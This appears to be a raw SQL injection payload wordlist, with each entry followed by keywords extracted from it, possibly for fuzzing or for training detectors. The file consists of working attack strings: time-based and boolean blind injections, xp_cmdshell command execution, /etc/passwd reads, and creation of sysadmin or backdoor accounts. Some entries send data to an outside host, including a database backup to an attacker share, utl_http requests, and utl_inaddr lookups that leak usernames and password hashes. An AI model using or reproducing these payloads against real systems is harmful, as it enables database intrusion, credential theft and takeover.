" or sleep(__time__)#	__time__' or sleep(__time__)#	__time__" or sleep(__time__)="	__time__' or sleep(__time__)='	__time__") or sleep(__time__)="	__time__') or sleep(__time__)='	__time__")) or sleep(__time__)="	__time__')) or sleep(__time__)='	__time__;waitfor delay '0:0:__time__'--	__time__);waitfor delay '0:0:__time__'--	__time__';waitfor delay '0:0:__time__'--	__time__";waitfor delay '0:0:__time__'--	__time__');waitfor delay '0:0:__time__'--	__time__");waitfor delay '0:0:__time__'--	__time__));waitfor delay '0:0:__time__'--	__time__'));waitfor delay '0:0:__time__'--	__time__"));waitfor delay '0:0:__time__'--	__time__1 or benchmark(10000000,md5(1))#	" or benchmark(10000000,md5(1))#	' or benchmark(10000000,md5(1))#	1) or benchmark(10000000,md5(1))#	") or benchmark(10000000,md5(1))#	') or benchmark(10000000,md5(1))#	1)) or benchmark(10000000,md5(1))#	")) or benchmark(10000000,md5(1))#	')) or benchmark(10000000,md5(1))#	) or ('x'='x	x; execute immediate 'sel' || 'ect us' || 'er'	er
ect
sel
us
immediate";waitfor delay '0:0:__time__'--	__time__||(elt(-3+5,bin(15),ord(10),hex(char(45))))	"hi"") or (""a""=""a"	hi" or sleep(__time__)#	__time__) or ('a'='a	@var select @var as var into temp end --	temp
end1)) or benchmark(10000000,md5(1))#	"a"" or 3=3--"	" or benchmark(10000000,md5(1))#	1 waitfor delay '0:0:10'--	 or 'a'='a	or a = a	) or sleep(__time__)='	__time__)) or benchmark(10000000,md5(1))#	hi' or 'a'='a	hi")) or benchmark(10000000,md5(1))#	hi') or ('a'='a	hi));waitfor delay '0:0:__time__'--	__time__a' waitfor delay '0:0:10'--	 or '7659'='7659	 or 'text' = n'text'	text
n or 1=1 or ''='	declare @s varchar (200) select @s = 0x73656c6 ...	; exec master..xp_cmdshell 'ping 172.10.1.255'--	master or 'unusual' = 'unusual'	unusual1) or benchmark(10000000,md5(1))#	declare @s varchar(200) select @s = 0x77616974 ...	"));waitfor delay '0:0:__time__'--	__time__or a=a	" or "a"="a	 and 1=( if((load_file(char(110,46,101,120,11 ...	110,46,101,120,11t'exec master..xp_cmdshell 'nslookup www.googl ...	www
googl
t
master
nslookup1 or benchmark(10000000,md5(1))#	 or ''='	hi' or 'x'='x';	x
hi") or sleep(__time__)="	__time__ or 'whatever' in ('whatever')	whatever; begin declare @var varchar(8000) set @var=' ...	 union select 1,load_file('/etc/passwd'),1,1,1;	etc
,1,1,1
passwda' or 1=1--	a' or 'a' = 'a	declare @s varchar(22) select @s =	 or a=a--	 or '1'='1	 or sleep(__time__)='	__time__or 0=0 #"	declare @s varchar (8000) select @s = 0x73656c ...	) or benchmark(10000000,md5(1))#	;waitfor delay '0:0:__time__'--	__time__ or 'text' > 't'	text
t or benchmark(10000000,md5(1))#	");waitfor delay '0:0:__time__'--	__time__a' or 3=3--	 or ''='	")) or sleep(__time__)="	__time__ or 'x'='x	x or 'something' = 'some'+'thing'	some
thing
something) or (a=a	x' and 1=(select count(*) from tabname); --	tabname
x; or '1'='1'	declare @q nvarchar (200) select @q = 0x770061 ...	; exec ('sel' + 'ect us' + 'er')	sel
us
er
ectanything' or 'x'='x	x
anythingdeclare @q nvarchar (4000) select @q =	 select name from syscolumns where id = (sele ...	syscolumns
selehi or a=a	hi);waitfor delay '0:0:__time__'--	__time__") or benchmark(10000000,md5(1))#	)) or sleep(__time__)='	__time__or 1=1 or ""=	 union select * from users where login = char ...	loginx' or 1=1 or 'x'='y	y
x or '1'='1'--	"a"" or 1=1--"	 or a = a	declare @q nvarchar (200) select @q = 0x770061006900740066006f0072002000640065006c00610079002000270030003a0030003a0031003000270000 exec(@q)	declare @s varchar(200) select @s = 0x77616974666f722064656c61792027303a303a31302700 exec(@s) 	declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)	declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)	x' or full_name like '%bob%	full_name
bob
x'; exec master..xp_cmdshell 'ping 172.10.1.255'--	master' or ''='	' or 'x'='x	x') or ('x'='x	x' or 0=0 #	 or 0=0 #"	' or '1'='1'--	' or 1=1 or ''='	 or 1=1 or ""=	' or a=a--	 or a=a	') or ('a'='a	'hi' or 'x'='x';	x
hi' or username like '%	username' or uname like '%	uname' or userid like '%	userid' or uid like '%	uid' or user like '%	usert'exec master..xp_cmdshell 'nslookup www.google.com'--	www
t
master
google
nslookup
com<>"'%;)(&+	' or ''='	'; exec master..xp_cmdshell 'ping 10.10.1.2'--	master'create user name identified by 'pass123' --	user
pass123'create user name identified by pass123 temporary tablespace temp default tablespace users; 	temporary
user
temp
pass123'exec sp_addlogin 'name' , 'password' --	sp_addlogin
password' exec sp_addsrvrolemember 'name' , 'sysadmin' --	sysadmin
sp_addsrvrolemember' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --	user
pass123
mysql
host
password' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)	level
login
password' union (select null, (select @@version)) --	' union (select null, null, (select @@version)) --	' union (select null, null, null,  (select @@version)) --	' union (select null, null, null, null,  (select @@version)) --	' union (select null, null, null, null,  null, (select @@version)) --	exec master..xp_cmdshell 'ipconfig+/all'		masterexec master..xp_cmdshell 'net+view'	net
master
viewexec master..xp_cmdshell 'net+users'	net
masterexec master..xp_cmdshell 'ping+<attackerip>'	master
attackeripbackup database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'	backup
to
backupdb
attackerip
dat
disks
mastercreate table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspв'" select * from myfile"--	line
myfile
bulk
foo
wwwroot
inetpub
aspв
auth1' and 1=(select count(*) from tablenames); --	tablenames1' or '1'='1	create table myfile (input text); load data infile '<filepath>' into table myfile; select * from myfile;	text
infile
myfile
filepath'or '' = '	' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--	user
pass
fieldname' or '1'='1	'||utl_http.request('http://192.168.1.1/')||'	request
||utl_http' || myappadmin.adduser('admin', 'newpass') || '	admin
newpass
adduser
myappadmin' and 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1)) and 'i'='i	banner
v
rownum' and 1=utl_inaddr.get_host_address((select sys.login_user from dual)) and 'i'='i	login_user
dual' and 1=utl_inaddr.get_host_address((select sys.database_name from dual)) and 'i'='i	database_name
dual' and 1=utl_inaddr.get_host_address((select host_name from v$instance)) and 'i'='i	v
host_name
instance' and 1=utl_inaddr.get_host_address((select global_name from global_name)) and 'i'='i	global_name' and 1=utl_inaddr.get_host_address((select count(distinct(username)) from sys.all_users)) and 'i'='i	all_users
username' and 1=utl_inaddr.get_host_address((select count(distinct(password)) from sys.user$)) and 'i'='i	user
password' and 1=utl_inaddr.get_host_address((select count(distinct(table_name)) from sys.all_tables)) and 'i'='i	all_tables
table_name' and 1=utl_inaddr.get_host_address((select count(distinct(column_name)) from sys.all_tab_columns)) and 'i'='i	column_name
all_tab_columns' and 1=utl_inaddr.get_host_address((select count(distinct(granted_role)) from dba_role_privs where grantee=sys.login_user)) and 'i'='i	grantee
granted_role
dba_role_privs
login_user' and 1=utl_inaddr.get_host_address((select distinct(username) from (select distinct(username), rownum as limit from sys.all_users) where limit=1)) and 'i'='i	all_users
username
rownum' and 1=utl_inaddr.get_host_address((select distinct(password) from (select distinct(password), rownum as limit from sys.user$) where limit=1)) and 'i'='i	user
rownum
password' and 1=utl_inaddr.get_host_address((select distinct(table_name) from (select distinct(table_name), rownum as limit from sys.all_tables) where limit=1)) and 'i'='i	all_tables
rownum
table_name' and 1=utl_inaddr.get_host_address((select distinct(column_name) from (select distinct(column_name), rownum as limit from all_tab_columns) where limit=1)) and 'i'='i	column_name
all_tab_columns
rownum' and 1=utl_inaddr.get_host_address((select distinct(granted_role) from (select distinct(granted_role), rownum as limit from dba_role_privs where grantee=sys.loginuser) where limit=1)) and 'i'='i	granted_role
loginuser
grantee
dba_role_privs
rownum' and 1=utl_inaddr.get_host_address((select distinct(username) from (select distinct(username), rownum as limit from sys.all_users) where limit=2)) and 'i'='i	all_users
username
rownum' and 1=utl_inaddr.get_host_address((select distinct(password) from (select distinct(password), rownum as limit from sys.user$) where limit=2)) and 'i'='i	user
rownum
password' and 1=utl_inaddr.get_host_address((select distinct(table_name) from (select distinct(table_name), rownum as limit from sys.all_tables) where limit=2)) and 'i'='i	all_tables
rownum
table_name' and 1=utl_inaddr.get_host_address((select distinct(column_name) from (select distinct(column_name), rownum as limit from all_tab_columns) where limit=2)) and 'i'='i	column_name
all_tab_columns
rownum' and 1=utl_inaddr.get_host_address((select distinct(granted_role) from (select distinct(granted_role), rownum as limit from dba_role_privs where grantee=sys.loginuser) where limit=2)) and 'i'='i	granted_role
loginuser
grantee
dba_role_privs
rownum' and 1=utl_inaddr.get_host_address((select distinct(username) from (select distinct(username), rownum as limit from sys.all_users) where limit=3)) and 'i'='i	all_users
username
rownum' and 1=utl_inaddr.get_host_address((select distinct(password) from (select distinct(password), rownum as limit from sys.user$) where limit=3)) and 'i'='i	user
rownum
password' and 1=utl_inaddr.get_host_address((select distinct(table_name) from (select distinct(table_name), rownum as limit from sys.all_tables) where limit=3)) and 'i'='i	all_tables
rownum
table_name' and 1=utl_inaddr.get_host_address((select distinct(column_name) from (select distinct(column_name), rownum as limit from all_tab_columns) where limit=3)) and 'i'='i	column_name
all_tab_columns
rownum' and 1=utl_inaddr.get_host_address((select distinct(granted_role) from (select distinct(granted_role), rownum as limit from dba_role_privs where grantee=sys.loginuser) where limit=3)) and 'i'='i	granted_role
loginuser
grantee
dba_role_privs
rownum' and 1=utl_inaddr.get_host_address((select distinct(username) from (select distinct(username), rownum as limit from sys.all_users) where limit=4)) and 'i'='i	all_users
username
rownum' and 1=utl_inaddr.get_host_address((select distinct(password) from (select distinct(password), rownum as limit from sys.user$) where limit=4)) and 'i'='i	user
rownum
password' and 1=utl_inaddr.get_host_address((select distinct(table_name) from (select distinct(table_name), rownum as limit from sys.all_tables) where limit=4)) and 'i'='i	all_tables
rownum
table_name' and 1=utl_inaddr.get_host_address((select distinct(column_name) from (select distinct(column_name), rownum as limit from all_tab_columns) where limit=4)) and 'i'='i	column_name
all_tab_columns
rownum' and 1=utl_inaddr.get_host_address((select distinct(granted_role) from (select distinct(granted_role), rownum as limit from dba_role_privs where grantee=sys.loginuser) where limit=4)) and 'i'='i	granted_role
loginuser
grantee
dba_role_privs
rownum' and 1=utl_inaddr.get_host_address((select distinct(username) from (select distinct(username), rownum as limit from sys.all_users) where limit=5)) and 'i'='i	all_users
username
rownum' and 1=utl_inaddr.get_host_address((select distinct(password) from (select distinct(password), rownum as limit from sys.user$) where limit=5)) and 'i'='i	user
rownum
password' and 1=utl_inaddr.get_host_address((select distinct(table_name) from (select distinct(table_name), rownum as limit from sys.all_tables) where limit=5)) and 'i'='i	all_tables
rownum
table_name' and 1=utl_inaddr.get_host_address((select distinct(column_name) from (select distinct(column_name), rownum as limit from all_tab_columns) where limit=5)) and 'i'='i	column_name
all_tab_columns
rownum' and 1=utl_inaddr.get_host_address((select distinct(granted_role) from (select distinct(granted_role), rownum as limit from dba_role_privs where grantee=sys.loginuser) where limit=5)) and 'i'='i	granted_role
loginuser
grantee
dba_role_privs
rownum' and 1=utl_inaddr.get_host_address((select distinct(username) from (select distinct(username), rownum as limit from sys.all_users) where limit=6)) and 'i'='i	all_users
username
rownum' and 1=utl_inaddr.get_host_address((select distinct(password) from (select distinct(password), rownum as limit from sys.user$) where limit=6)) and 'i'='i	user
rownum
password' and 1=utl_inaddr.get_host_address((select distinct(table_name) from (select distinct(table_name), rownum as limit from sys.all_tables) where limit=6)) and 'i'='i	all_tables
rownum
table_name' and 1=utl_inaddr.get_host_address((select distinct(column_name) from (select distinct(column_name), rownum as limit from all_tab_columns) where limit=6)) and 'i'='i	column_name
all_tab_columns
rownum' and 1=utl_inaddr.get_host_address((select distinct(granted_role) from (select distinct(granted_role), rownum as limit from dba_role_privs where grantee=sys.loginuser) where limit=6)) and 'i'='i	granted_role
loginuser
grantee
dba_role_privs
rownum' and 1=utl_inaddr.get_host_address((select distinct(username) from (select distinct(username), rownum as limit from sys.all_users) where limit=7)) and 'i'='i	all_users
username
rownum' and 1=utl_inaddr.get_host_address((select distinct(password) from (select distinct(password), rownum as limit from sys.user$) where limit=7)) and 'i'='i	user
rownum
password' and 1=utl_inaddr.get_host_address((select distinct(table_name) from (select distinct(table_name), rownum as limit from sys.all_tables) where limit=7)) and 'i'='i	all_tables
rownum
table_name' and 1=utl_inaddr.get_host_address((select distinct(column_name) from (select distinct(column_name), rownum as limit from all_tab_columns) where limit=7)) and 'i'='i	column_name
all_tab_columns
rownum' and 1=utl_inaddr.get_host_address((select distinct(granted_role) from (select distinct(granted_role), rownum as limit from dba_role_privs where grantee=sys.loginuser) where limit=7)) and 'i'='i	granted_role
loginuser
grantee
dba_role_privs
rownum' and 1=utl_inaddr.get_host_address((select distinct(username) from (select distinct(username), rownum as limit from sys.all_users) where limit=8)) and 'i'='i	all_users
username
rownum' and 1=utl_inaddr.get_host_address((select distinct(password) from (select distinct(password), rownum as limit from sys.user$) where limit=8)) and 'i'='i	user
rownum
password' and 1=utl_inaddr.get_host_address((select distinct(table_name) from (select distinct(table_name), rownum as limit from sys.all_tables) where limit=8)) and 'i'='i	all_tables
rownum
table_name' and 1=utl_inaddr.get_host_address((select distinct(column_name) from (select distinct(column_name), rownum as limit from all_tab_columns) where limit=8)) and 'i'='i	column_name
all_tab_columns
rownum' and 1=utl_inaddr.get_host_address((select distinct(granted_role) from (select distinct(granted_role), rownum as limit from dba_role_privs where grantee=sys.loginuser) where limit=8)) and 'i'='i	granted_role
loginuser
grantee
dba_role_privs
rownumselect current_setting('log_connections');	log_connectionsselect current_setting('log_statement');	log_statementselect current_setting('port');	portselect current_setting('password_encryption');	password_encryptionselect current_setting('krb_server_keyfile');	krb_server_keyfileselect current_setting('virtual_host');	virtual_hostselect current_setting('port');	portselect current_setting('config_file');	config_fileselect current_setting('hba_file');	hba_fileselect current_setting('data_directory');	data_directorysleep(1) /*‘ or sleep(1) or ‘“ or sleep(1) or “*/	*‘
‘“
“*sleep(1) /*' or sleep(1) or '" or sleep(1) or "*/	